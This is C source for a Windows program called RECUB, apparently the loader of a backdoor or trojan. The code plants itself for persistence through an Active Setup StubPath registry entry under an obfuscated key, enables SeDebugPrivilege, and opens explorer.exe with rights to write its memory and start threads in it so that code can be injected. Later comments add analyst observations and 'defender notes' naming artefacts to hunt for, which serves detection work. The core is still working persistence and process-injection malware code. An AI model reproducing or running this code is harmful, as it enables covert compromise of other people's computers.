///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////
//																					 //		
//									RECUB											 //
//								  By Hirosh											 //	
//								www.hirosh.net										 //				
//								www.eos-india.net									 //	
//																					 //		
//Thanks for starch at http://mir-os.sourceforge.net For the idea,I started this by  //	
//porting his version in linux to win32,after some time i stoped porting bc i prefer //
//a small EXE heheh..,and thanks to NC source too..									 //		
//																					 //	
//				No CopyRights		- Feel Free to Cut & Paste	  				     // 	
//																					 //
//																					 //						
///////////////////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////////////////

#include "stdafx.h"
#include <Tlhelp32.h>
#include "Tiny.h"
#include "inject.h"
#define REGKEY "{H9I12RB03-AB-B70-7-11d2-9CBD-0O00FS7AH6-9E2121BHJLK}"

BOOL Is2kXP()
{
	// Reports whether the host is an NT-family release with major version 5
	// (Windows 2000 / XP / Server 2003). dwPlatformId 2 is VER_PLATFORM_WIN32_NT.
	// Returns FALSE when the version query itself fails.
	OSVERSIONINFO version;
	version.dwOSVersionInfoSize = sizeof version;

	if (!GetVersionEx(&version))
	{
		return FALSE;
	}

	const bool ntFamily = (version.dwPlatformId == 2);
	const bool major5 = (version.dwMajorVersion == 5);
	return (ntFamily && major5) ? TRUE : FALSE;
}
// Enables SeDebugPrivilege on the current process token so that OpenProcess
// can later succeed against processes the caller does not own.
// Best-effort: every failure path returns silently, and the result of
// AdjustTokenPrivileges is not checked, so the caller cannot tell whether the
// privilege was actually granted (it requires an account that already holds it).
// Defender note: a non-system binary enabling SeDebugPrivilege right before
// opening another process is a common precursor to cross-process tampering and
// is worth alerting on.
void EnableDebugPriv( void )
{
	HANDLE hToken;
	LUID sedebugnameValue;
	TOKEN_PRIVILEGES tkp;

	// Token needs ADJUST_PRIVILEGES to change it and QUERY for AdjustTokenPrivileges.
	if ( ! OpenProcessToken( GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken ) )
		return;


	// Resolve the LUID for SE_DEBUG_NAME on the local system.
	if ( ! LookupPrivilegeValue( NULL, SE_DEBUG_NAME, &sedebugnameValue ) )
	{
		CloseHandle( hToken );
		return;
	}

	// Single privilege, set to enabled.
	tkp.PrivilegeCount = 1;
	tkp.Privileges[0].Luid = sedebugnameValue;
	tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	// Return value ignored: a partial/failed adjustment is not detected here.
	AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL );
	CloseHandle( hToken );
}
// Walks the process list and returns a handle to the first process whose image
// name is EXPLORER.EXE, opened with the rights needed to write memory and create
// a thread in it (the caller passes it to InjectIntoExplorer).
// Returns FALSE (cast to HANDLE, i.e. NULL) when no matching process could be opened.
// Observations for analysts: the snapshot handle from CreateToolhelp32Snapshot is
// not validated and is not closed on the success path; the Process32First result
// is ignored, so the loop may compare against an uninitialised entry.
// Defender note: OpenProcess on explorer.exe with PROCESS_VM_WRITE |
// PROCESS_CREATE_THREAD from an unknown binary is a strong injection indicator.
HANDLE GetExplorerProcessHandle( void )
{
	HANDLE hSnap;
	PROCESSENTRY32 ppe;
	HANDLE h;
	// Raise SeDebugPrivilege first so OpenProcess can reach processes of other users.
	EnableDebugPriv();
	hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

	ppe.dwSize = sizeof( PROCESSENTRY32 );
	Process32First( hSnap, &ppe );
	while ( 1 ) {
	// Normalise the image name to upper case in place for a case-sensitive compare.
	CharUpperBuff(ppe.szExeFile,strlen(ppe.szExeFile));
	if ( lstrcmp( "EXPLORER.EXE", ppe.szExeFile )==0 ) {
//	if ( lstrcmp( "WINLOGON.EXE", ppe.szExeFile )==0 ) {	
	// Access mask covers remote-thread creation plus read/write of the target's memory.
	h = OpenProcess( PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION |PROCESS_VM_WRITE | PROCESS_VM_READ, FALSE, ppe.th32ProcessID );
	if ( h != 0 ) {
	//MessageBox(0,ppe.szExeFile,"t",MB_OK);
	// Early return: hSnap is left open here.
	return h;
	}
	}
	if ( !Process32Next( hSnap, &ppe ) ) break;
	}
	CloseHandle( hSnap );
	return FALSE;
}
// Acquires a handle to the default Microsoft RSA provider, creating a key
// container if one is missing (user key set first, then machine key set), and
// releases it straight away. No result is checked, so this is best-effort; the
// purpose of priming the CSP is not visible from this file.
void SetupCSP()
{
	HCRYPTPROV provider = NULL;
	const DWORD attempts[] = { 0, CRYPT_NEWKEYSET, CRYPT_NEWKEYSET|CRYPT_MACHINE_KEYSET };
	const size_t attemptCount = sizeof attempts / sizeof attempts[0];

	BOOL acquired = FALSE;
	for (size_t i = 0; i < attemptCount && !acquired; i++)
	{
		acquired = CryptAcquireContext(&provider, NULL, MS_DEF_PROV, PROV_RSA_FULL, attempts[i]);
	}

	// Released unconditionally, even when every attempt failed and provider is still NULL.
	CryptReleaseContext(provider, 0);
}
// Entry point. Establishes persistence through Active Setup, then on
// Windows 2000/XP/2003 injects into explorer.exe (InjectIntoExplorer comes from
// inject.h and is not visible here) and exits. hPrevInstance, lpCmdLine and
// nCmdShow are unused.
// Defender note: the registry write below is the persistence artefact to hunt
// for - a StubPath value under
// HKLM\Software\Microsoft\Active Setup\Installed Components\<REGKEY> pointing at
// this executable; Active Setup runs StubPath for each user whose HKCU lacks the
// matching component key, and deleting the HKCU copy first forces re-execution.
int APIENTRY WinMain(HINSTANCE hInstance,
                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
SetupCSP();
char regkey[MAX_PATH];
char pathexe[MAX_PATH];
HKEY childkey = 0 ;
// Active setup startup
// Full path of this executable becomes the StubPath value.
GetModuleFileName(NULL,pathexe,MAX_PATH);
wsprintf(regkey,"%s%s","Software\\Microsoft\\Active Setup\\Installed Components\\",REGKEY);
// Remove any per-user marker so Active Setup treats the component as not yet run.
RegDeleteKey(HKEY_CURRENT_USER, ( LPCTSTR )regkey);
// Writing under HKLM requires administrative rights; results are not checked.
RegCreateKey(HKEY_LOCAL_MACHINE, ( LPCTSTR )regkey, &childkey );
// Data length is lstrlen(pathexe): the REG_SZ is stored without its terminating NUL.
RegSetValueEx (childkey, ( LPCTSTR )"StubPath" ,0, REG_SZ, ( const BYTE* ) ( LPCTSTR )pathexe,lstrlen(pathexe)) ;
RegCloseKey ( childkey);
//HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Afd\Parameters
//DisableRawSecurity==1
// Injection is only attempted on NT 5.x; hIE is not checked and may be NULL.
if(Is2kXP()){		
		HANDLE hIE=GetExplorerProcessHandle();
		InjectIntoExplorer( hIE );
		CloseHandle( hIE );
}
// Terminates without returning; the return below is unreachable.
ExitProcess(0);
return 0;
}


